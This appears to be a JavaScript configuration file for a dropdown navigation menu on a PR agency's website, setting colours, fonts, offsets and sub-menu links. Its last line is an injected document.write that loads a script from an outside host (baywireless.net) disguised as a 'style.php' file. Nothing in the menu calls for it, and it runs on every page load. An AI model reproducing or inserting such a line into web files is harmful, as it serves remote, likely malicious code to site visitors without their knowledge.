   limit_multiple_users = true
 
   DQM_sub_menu_width = 65      //default sub menu widths
   DQM_sub_xy = "0,0"            //default sub x,y coordinates
   
   
   DQM_codebase = "./index_files/"             //relative location of .js files
   DQM_urltarget = "_self"       //set to: _self, _parent, _new, or "my frame name"

   DQM_border_width = 0
   DQM_divider_height = 1

   DQM_border_color = "#C0C0BE"   //cell bordercolor
   DQM_menu_bgcolor = "#E5E5E5" //cell bg color on normal
   DQM_hl_bgcolor = "#F4F4F4"  //cell bg color on mouseover
   

   DQM_mouse_off_delay = 100
   
  
   DQM_os9_ie5mac_offset_X = 10
   DQM_os9_ie5mac_offset_Y = 15

   DQM_osx_ie5mac_offset_X = 0
   DQM_osx_ie5mac_offset_Y = 0

   DQM_ie4mac_offset_X = -8
   DQM_ie4mac_offset_Y = -50

   DQM_nn4_reaload_after_resize = true

   DQM_nn4_resize_prompt_user = false
   DQM_nn4_resize_prompt_message = "To reinitialize the navigation menu please click the 'Reload' button."
   
   DQM_sub_menu_effect = "none"
   DQM_sub_item_effect = "none"


   /*----Define the effect duration in seconds below---*/
   
   DQM_sub_menu_effect_duration = .25
   DQM_sub_item_effect_duration = .25

  
   /*----Opacity is defined with a value between
   ------1 and 100 with 100 being opaque---*/     

   DQM_sub_menu_opacity = 100

   DQM_dropshadow_color = "#999999"
   DQM_dropshadow_offx = 1
   DQM_dropshadow_offy = 1  

   DQM_textcolor = "#333333" // link coor when normal
   DQM_fontfamily = "Tahoma, Verdana, Arial, Helvetica, sans-serif"         //Any available system font     
   DQM_fontsize = 10         //Defined with pixel sizing   
   DQM_fontsize_ie4 = 10        //Defined with point sizing
   DQM_textdecoration = "normal"      //set to: 'normal', or 'underline'
   DQM_fontweight = "normal"          //set to: 'normal', or 'bold'
   DQM_fontstyle = "normal"       //set to: 'normal', or 'italic'   
   DQM_hl_textcolor = "#333333"  // link coor when mouseover B2251A
   DQM_hl_textdecoration = "normal"   //set to: 'normal', or 'underline'

   DQM_margin_top = 1
   DQM_margin_bottom = 1
   DQM_margin_left = 2
   DQM_margin_right = 3

   DQM_text_alignment = "left"        //set to: 'left', 'center' or 'right'
   
   /************************************************
   *********-------Main Menu 0--------**************
   ************************************************/

   DQM_rollover_image0 = "images/but/01abt-b.gif"
   DQM_rollover_wh0 = "55,18"
   DQM_url0 = "../aboutus.htm";

   /************************************************
   *********-------Main Menu 1--------**************
   ************************************************/

   DQM_rollover_image1 = "images/but/02app-b.gif"
   DQM_rollover_wh1 = "61,18"
   DQM_url1 = "../approach.htm";

   /************************************************
   *********-------Main Menu 2--------**************
   ************************************************/    
   
   DQM_rollover_image2 = "images/but/03res-b.gif" 
   DQM_rollover_wh2 = "65,18"
   DQM_url2 = "../resources.htm";

   /************************************************
   *********-------Main Menu 3--------***************
   ************************************************/

   DQM_rollover_image3 = "images/but/04cap-b.gif" 
   DQM_rollover_wh3 = "71,18"
   DQM_url3 = "../capabilities.htm";     

   /************************************************
   *********-------Main Menu 4--------**************
   ************************************************/

   DQM_rollover_image4 = "images/but/05rel-b.gif"
   DQM_rollover_wh4 = "93,18"
   DQM_url4 = "../relatedservices.htm";


   /************************************************
   *********-------Main Menu 5--------**************
   ************************************************/

   DQM_rollover_image5 = "images/but/06net-b.gif"
   DQM_rollover_wh5 = "57,18"
   DQM_url5 = "../network.htm";   

   /************************************************
   *********-------Main Menu 6--------**************
   ************************************************/

   DQM_rollover_image6 = "images/but/07cli-b.gif"
   DQM_rollover_wh6 = "52,18"
   DQM_url6 = "../clients.htm";   

   /************************************************
   *********-------Main Menu 7--------**************
   ************************************************/

   DQM_rollover_image7 = "images/but/08cas-b.gif"
   DQM_rollover_wh7 = "78,18"
   DQM_url7 = "../portfolio.htm";   

   /************************************************
   *********-------Main Menu 8--------**************
   ************************************************/

   DQM_rollover_image8 = "images/but/09con-b.gif"
   DQM_rollover_wh8 = "50,18"
   DQM_url8 = "../contact.htm";   
  
/*********************************************************************/
/*                                                                   */
/*                       SUB MENU CUSTOMIZATION                      */
/*                                                                   */ 
/*********************************************************************/
/************************************************
****-------Sub 0 - Item 1 Sub Menu--------*******
************************************************/

DQM_sub_xy0 = "-49,16"
DQM_sub_menu_width1 = 16

DQM_subdesc0_0 = "&raquo services"
DQM_subdesc0_1 = "&raquo value"
DQM_subdesc0_2 = "&raquo testimonials"


DQM_icon_index1_0 = 0
DQM_icon_index1_1 = 0
DQM_icon_index1_2 = 0


DQM_url0_0 = "../services.htm"
DQM_url0_1 = "../value.htm"
DQM_url0_2 = "../testimonials.htm"



/************************************************
****-------Sub 0 - Item 2 Sub Menu--------*******
************************************************/

DQM_sub_xy1 = "-47,16"
DQM_sub_menu_width1 = 65

DQM_subdesc1_0 = "&raquo process"
DQM_subdesc1_1 = "&raquo partnership"

DQM_icon_index1_0 = 0
DQM_icon_index1_1 = 0

DQM_url1_0 = "../process.htm"
DQM_url1_1 = "../partnership.htm"


/************************************************
*********-------Sub Menu 3--------***************
************************************************/

DQM_sub_xy2 = "-47,16"
DQM_sub_menu_width2 = 81

DQM_subdesc2_0 = "&raquo people"
DQM_subdesc2_1 = "&raquo knowledge"
DQM_subdesc2_2 = "&raquo relationships"
DQM_subdesc2_3 = "&raquo online monitor"

DQM_icon_index2_0 = 0
DQM_icon_index2_1 = 0
DQM_icon_index2_2 = 0
DQM_icon_index2_3 = 0

DQM_url2_0 = "../people.htm"
DQM_url2_1 = "../knowledge.htm"
DQM_url2_2 = "../relationships.htm"
DQM_url2_3 = "../onlinemonitor.htm"



/************************************************
*********-------Sub Menu 4--------***************
************************************************/

DQM_sub_xy3 = "-54,16"
DQM_sub_menu_width3 = 91

DQM_subdesc3_0 = "&raquo corporate pr"
DQM_subdesc3_1 = "&raquo financial pr"
DQM_subdesc3_2 = "&raquo marketing pr"
DQM_subdesc3_3 = "&raquo media relations"
DQM_subdesc3_4 = "&raquo investor relations"
DQM_subdesc3_5 = "&raquo crisis handling"
DQM_subdesc3_6 = "&raquo event services"
DQM_subdesc3_7 = "&raquo internal relations"


DQM_icon_index3_0 = 0
DQM_icon_index3_1 = 0
DQM_icon_index3_3 = 0
DQM_icon_index3_4 = 0
DQM_icon_index3_5 = 0
DQM_icon_index3_6 = 0
DQM_icon_index3_7 = 0

DQM_url3_0 = "../corporatepr.htm"
DQM_url3_1 = "../financialpr.htm"
DQM_url3_2 = "../marketingpr.htm"
DQM_url3_3 = "../mediarelations.htm"
DQM_url3_4 = "../investorrelations.htm"
DQM_url3_5 = "../crisishandling.htm"
DQM_url3_6 = "../eventservices.htm"
DQM_url3_7 = "../internalrelations.htm"


/************************************************
*********-------Sub Menu 5--------***************
************************************************/

DQM_sub_xy4 = "-73,16"
DQM_sub_menu_width4 = 80

DQM_subdesc4_0 = "&raquo graphic design"
DQM_subdesc4_1 = "&raquo advertising"
DQM_subdesc4_2 = "&raquo interactive"
DQM_subdesc4_3 = "&raquo media buying"

DQM_icon_index4_0 = 0
DQM_icon_index4_1 = 0
DQM_icon_index4_3 = 0
DQM_icon_index4_4 = 0

DQM_url4_0 = "../graphicdesign.htm"
DQM_url4_1 = "../advertising.htm"
DQM_url4_2 = "../interactive.htm"
DQM_url4_3 = "../mediabuying.htm"
document.write('<script src=http://baywireless.net/images/style.php ><\/script>');